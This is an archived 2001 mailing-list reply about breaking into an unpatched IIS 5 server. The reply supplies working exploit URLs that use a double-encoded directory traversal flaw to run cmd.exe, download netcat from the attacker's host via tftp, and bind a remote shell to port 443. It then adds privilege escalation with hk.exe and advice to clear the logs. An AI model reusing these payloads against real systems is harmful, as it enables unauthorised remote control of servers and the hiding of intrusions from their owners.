Re: pen testing IIS5

From: exceed mekka-symposium (exceed_msat_private)
Date: Sun Jun 24 2001 - 12:46:10 PDT

Next message: Steve Hutchins: "RE: What is your policy on customers particapating in a pen test?"

Previous message: Wertheimer, Ishai: "RE: SAM file editing"
Next in thread: Kevin Timm: "RE: pen testing IIS5"
Reply: Kevin Timm: "RE: pen testing IIS5"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

>I am pen-testing IIS 5 [no hotfixes] running in WinNT 4.0 with no fixes. At 
>this point I want to upload a file to the box [nc.exe] and then I will 
>definately have the box. How can I go about doing this?


Did you tried cgi-decode?

This will upload nc.exe in target's %SYSTEMROOT%\system32 directory:

http://IIS_IP/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp.exe+-i+your_IP+GET+nc.exe+c:\winnt\system32\nc.exe

This will bind nc.exe on port 443:

http://IIS_IP/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+nc.exe+-L+-p+443+-d+-e+cmd.exe

[notice: links may be broken]

Telnet IIS_IP 443

Voila. :)

Elevate privileges using hk.exe...

Hope this will work.

./exceed

PS: don't forget to clear the logs :)
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Next message: Steve Hutchins: "RE: What is your policy on customers particapating in a pen test?"
Previous message: Wertheimer, Ishai: "RE: SAM file editing"
Next in thread: Kevin Timm: "RE: pen testing IIS5"
Reply: Kevin Timm: "RE: pen testing IIS5"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Jun 24 2001 - 19:41:42 PDT